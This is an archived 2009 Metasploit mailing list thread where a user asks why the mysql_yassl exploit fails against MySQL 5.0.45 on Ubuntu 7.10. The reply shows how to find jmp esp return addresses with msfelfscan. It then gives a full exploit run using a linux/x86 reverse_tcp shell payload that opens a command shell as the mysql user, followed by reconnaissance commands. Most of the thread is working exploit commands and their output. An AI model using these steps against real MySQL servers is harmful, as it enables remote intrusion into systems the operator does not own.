Metasploit mailing list archives
exploit mysql_yassl unsuccessful
From: mc at metasploit.com (MC)
Date: Fri, 6 Mar 2009 09:05:34 -0500 (EST)
yeah, just adjust your ret and you should be good to go:

$ ./msfelfscan /usr/sbin/mysqld -j esp | grep fb
0x0837fbb8 push esp; ret
0x0857dffb jmp esp
0x0858fb7f jmp esp
0x085fb710 push esp; retn 0x0000
0x086c76fb jmp esp

///

msf exploit(mysql_yassl) > set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
msf exploit(mysql_yassl) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Trying target MySQL 5.0.45-Debian_1ubuntu3.1-log...
[*] Sending stage (36 bytes)
[*] Command shell session 1 opened (192.168.0.188:1975 -> 192.168.0.149:45602)

pwd
/var/lib/mysql
id
uid=109(mysql) gid=120(mysql) groups=120(mysql)
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=7.10
DISTRIB_CODENAME=gutsy
DISTRIB_DESCRIPTION="Ubuntu 7.10"

On Thu, 5 Mar 2009, MC wrote:
> it's been a minute since i've written that. but you may need to adjust
> the return for your target.
>
> On Fri, 6 Mar 2009, Lauri Kiiski wrote:
>> Hi
>>
>> I'm unable to get linux/mysql/mysql_yassl working. Is there something
>> basic that I'm missing here?
>>
>> The target is Ubuntu 7.10 without any updates and MySQL
>> 5.0.45-Debian_1ubuntu3-log. SSL is enabled in MySQL and I can connect
>> to it with SSL.
>>
>> My MySQL is a different version. Is it a problem? I think I can't get
>> the exact version used in the exploit module since updates are newer.
>>
>> Here are the commands and output of the module. I tried with two
>> different payloads.
>>
>> use linux/mysql/mysql_yassl
>> set rhost target.ip
>> set payload linux/x86/shell/bind_tcp
>> set rhost target.ip
>> msf exploit(mysql_yassl) > exploit
>> [*] Started bind handler
>> [*] Trying target MySQL 5.0.45-Debian_1ubuntu3.1-log...
>> [*] Exploit completed, but no session was created.
>> msf exploit(mysql_yassl) > set payload linux/x86/shell/reverse_tcp
>> set lhost msf.ip
>> msf exploit(mysql_yassl) > exploit
>> [*] Started reverse handler
>> [*] Trying target MySQL 5.0.45-Debian_1ubuntu3.1-log...
>> [*] Exploit completed, but no session was created.
>> msf exploit(mysql_yassl) >
>> _______________________________________________
>> http://spool.metasploit.com/mailman/listinfo/framework
-- ~ mc
Current thread:
- exploit mysql_yassl unsuccessful Lauri Kiiski (Mar 05)
- exploit mysql_yassl unsuccessful MC (Mar 05)
- exploit mysql_yassl unsuccessful MC (Mar 06)
- exploit mysql_yassl unsuccessful Lauri Kiiski (Mar 30)
- exploit mysql_yassl unsuccessful MC (Mar 30)
- exploit mysql_yassl unsuccessful MC (Mar 06)
- exploit mysql_yassl unsuccessful MC (Mar 05)